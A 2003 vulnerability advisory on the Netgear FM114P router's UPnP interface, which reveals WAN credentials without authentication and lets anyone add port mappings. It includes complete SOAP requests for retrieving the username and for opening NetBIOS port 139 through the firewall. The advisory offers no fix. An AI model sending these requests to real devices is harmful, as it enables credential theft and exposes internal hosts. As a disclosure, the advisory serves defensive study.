6th Apr 2003 [SBWID-6110]
COMMAND
	Netgear FM114P ProSafe Wireless Router upnp hole
SYSTEMS AFFECTED
	Netgear FM114P ProSafe Wireless  Router,  firmware  versions  v1.4  Beta
	Release 21 has been tested, all  previous  versions  with  upnp  may  be
	affected.
PROBLEM
	Bjorn Stickler [[email protected]] found :
	When remote-access and upnp features are  enabled,  the  WAN  connection
	username and password can be retrieved without any authentication  using
	upnp. if remote management is enabled anyone can do this from  the  web.
	this is done by  using  upnp  soap  requests  to  the  router  with  the
	functions  GetUserName  and  GetPassword.  i  don=B4t  know   why   such
	functions exist, because  router  configuration  is  normally  done  via
	web-interface.
	 
	---- begin of example request to get username --------------
	POST /upnp/service/WANPPPConnection HTTP/1.1
	HOST: 192.168.0.1:80
	SOAPACTION: =
	"urn:schemas-upnp-org:service:WANPPPConnection:1#GetUserName"
	CONTENT-TYPE: text/xml ; charset=3D"utf-8"
	Content-Length: 289
	<?xml version=3D"1.0" encoding=3D"utf-8"?>
	<s:Envelope =
	s:encodingStyle=3D"http://schemas.xmlsoap.org/soap/encoding/"
	xmlns:s=3D"http://schemas.xmlsoap.org/soap/envelope/">
	   <s:Body>
	      <u:GetUserName
	xmlns:u=3D"urn:schemas-upnp-org:service:WANPPPConnection:1" />
	   </s:Body>
	</s:Envelope>
	---- end of example request to get username   --------------
	
	 -Also-
	b.stickler [http://intex.ath.cx] adds :
	It seems that several routers from level-one are also vulnerable to  the
	method described. And another nice feature is adding port  mappings  for
	passing through nat-firewall.
	 
	--- sample for passing port 139 (netbios) from internal ip 192.168.0.2: ---
	POST /upnp/service/WANPPPConnection HTTP/1.1
	Content-Type: text/xml; charset="utf-8"
	SOAPAction: =
	"urn:schemas-upnp-org:service:WANPPPConnection:1#AddPortMapping"
	User-Agent: Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)
	Host: 192.168.0.1
	Content-Length: 1123
	Connection: Keep-Alive
	Pragma: no-cache
	<?xml version="1.0"?>
	<SOAP-ENV:Envelope
	xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
	SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
	<SOAP-ENV:Body>
	<m:AddPortMapping =
	xmlns:m="urn:schemas-upnp-org:service:WANPPPConnection:1">
	<NewRemoteHost xmlns:dt="urn:schemas-microsoft-com:datatypes"
	dt:dt="string"></NewRemoteHost>
	<NewExternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes"
	dt:dt="ui2">139</NewExternalPort>
	<NewProtocol xmlns:dt="urn:schemas-microsoft-com:datatypes"
	dt:dt="string">TCP</NewProtocol>
	<NewInternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes"
	dt:dt="ui2">139</NewInternalPort>
	<NewInternalClient xmlns:dt="urn:schemas-microsoft-com:datatypes"
	dt:dt="string">192.168.0.6</NewInternalClient>
	<NewEnabled xmlns:dt="urn:schemas-microsoft-com:datatypes"
	dt:dt="boolean">1</NewEnabled>
	<NewPortMappingDescription =
	xmlns:dt="urn:schemas-microsoft-com:datatypes"
	dt:dt="string">NetBios</NewPortMappingDescription>
	<NewLeaseDuration xmlns:dt="urn:schemas-microsoft-com:datatypes"
	dt:dt="ui4">0</NewLeaseDuration>
	</m:AddPortMapping>
	</SOAP-ENV:Body>
	</SOAP-ENV:Envelope>
	
SOLUTION
	?